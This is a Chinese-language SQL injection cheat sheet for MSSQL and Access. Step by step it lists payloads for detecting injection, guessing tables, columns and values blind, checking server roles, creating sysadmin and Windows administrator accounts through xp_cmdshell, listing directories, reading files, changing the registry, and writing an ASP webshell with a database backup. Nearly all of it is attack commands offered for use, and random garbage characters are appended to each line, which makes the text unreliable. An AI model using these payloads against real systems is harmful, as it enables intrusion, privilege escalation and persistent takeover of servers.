1.判断是否有注入;and 1=1 ;and 1=2 #3=P4FUz.
2.初步判断是否是mssql ;and user>0 m9}AG Rj
vP@v.6gS,
3.注入参数是字符'and [查询条件] and ''=' %%ae^*[!n
:1q4"tv|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q-ES6R
W,@
If}
5.判断数据库系统 &5{xXWJK
mV^Zy
;and (select count(*) from sysobjects)>0 mssql dBV7Te4L
F(#rQ_z]
;and (select count(*) from msysobjects)>0 access ZPN
roCK`
i|)Su4Dw
y;?ie]3G
JPM))4YDR
6.猜数据库 ;and (select Count(*) from [数据库名])>0 L(>=BK*
g @I6$Z
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 dUznxZB
V}o n|A
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 39F
Of
M~*u;vA/
9.(1)猜字段的ascii值(access) |IoB?^_h
juF{}J2
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |]Z:&[D]i
e
pCLM_yA
(2)猜字段的ascii值(mssql) x.0p%O=`
R1:k23{
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 (}r|yE
mV73
\P6K
10.测试权限结构(mssql) I]"96'|N
p,pR!qC>
@4(k(
SQ,?N
XZ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <!$:8ls
(KZHX5T=
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- dm"n%
[ao
U5;7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- O|A_PyW
; R=.iOn
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- BG^C9*ZuP
R.[Z]-X
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- $P7iRM]
:M{Y,~cP
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "TV(H+1,z
!J*,)kRN
;and 1=(select IS_MEMBER('db_owner'));-- 3($"q]Y
%u^JpC{E
@UBjq%z
wfL-oi'5
11.添加mssql和系统的帐户 R8L_J6Kpa
uJR%0 E7!
;exec master.dbo.sp_addlogin username;-- qQi.?<d2"s
;exec master.dbo.sp_password null,username,password;-- thO ~=RB
Ko&hj XHx
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- .I VlEG0
3bqC\i^[\m
;exec master.dbo.xp_cmdshell 'net user username password N!Qg; (
WD;Y~|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z)XRx:YU;$
< _$%@4 L
;exec master.dbo.xp_cmdshell 'net user username password /add';-- =&0wr6
Bx"7%[
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Glq85S
]nQt>R p_
r!P}u
yq_LW>|Z
12.(1)遍历目录 p2J|Hl|
6qe*@o
;create table dirs(paths varchar(100), id int) 6+V\t+aug
w#JJXXQI
;insert dirs exec master.dbo.xp_dirtree 'c:\' M'`;{^<
-S,ln
;and (select top 1 paths from dirs)>0 Zn,>]X
<X TU8G
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) PN~@
S.B<pjgt
sG~<M"znV
Z=4{Vv*
(2)遍历目录
B .TB\j
Gc.P,K/hr
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- sC00un%
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 "M|P+A
Y
$g$x<7
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 wdzOFDA
Z3;!l
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 z3t~}aL
KtS)'jf
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q "oI])r
4GG>!@|
_<$>*i
R
E6Rz@"^XV
13.mssql中的存储过程 <J(sR
Ae^X35
xp_regenumvalues 注册表根键, 子键 /$n ~lf
xRuFuf8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 C
]Si|D
6m .k;'
xp_regread 根键,子键,键值名 ~,D@8tv
GN#<yv$av
;exec xp_regread "I;C;}!
5ep/h5*/
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 gu)=wu0
}],Z;:
xp_regwrite 根键,子键, 值名, 值类型, 值 WqxUX H
O 2{)WWOT
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 lcON+j
*5sBhx
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ?^'
7+8C*J
UE _fpq
xp_regdeletevalue 根键,子键,值名 _u"nvgVz9
2LCB])X
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 M)?dEgU}M
~mV"i7VX
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 g#NZ ,~
_a_xzv'
bG&"9b_c
}14{2=!Q
14.mssql的backup创建webshell $=sXAK9
IUGz =%[
use model z
sQo$p
i$^)UZJ&0
create table cmd(str image); C0.'_
eZ a:o1y
insert into cmd(str) values (''); -3Avs9`5
[LT^sb
backup database model to disk='c:\l.asp'; |6J ?8y
4@ILw
|{g+Y
GwsY-jf
15.mssql内置函数 HhA -[p
y`e4;*1
;and (select @@version)>0 获得Windows的版本号 f0+2t.tj
JXiZB
8}
;and user_name()='dbo' 判断当前系统的连接用户是不是sa {P8[X@Lu
n<Svwa}
;and (select user_name())>0 爆当前系统的连接用户 wI M{pK
{vaaFs
;and (select db_name())>0 得到当前连接的数据库 B}OY/J/*8
Gx?+9CV
p6EDQwlf
+c:3o*
16.简洁的webshell 7Y=cn_
wU
d
{lP
use model ?:^mBb)T
"%WgT2)m.
create table cmd(str image); 0)YbI!
Ap&)6g
insert into cmd(str) values (''); J MX6yV
"wH) mQnd
backup database model to disk='g:\wwwtest\l.asp';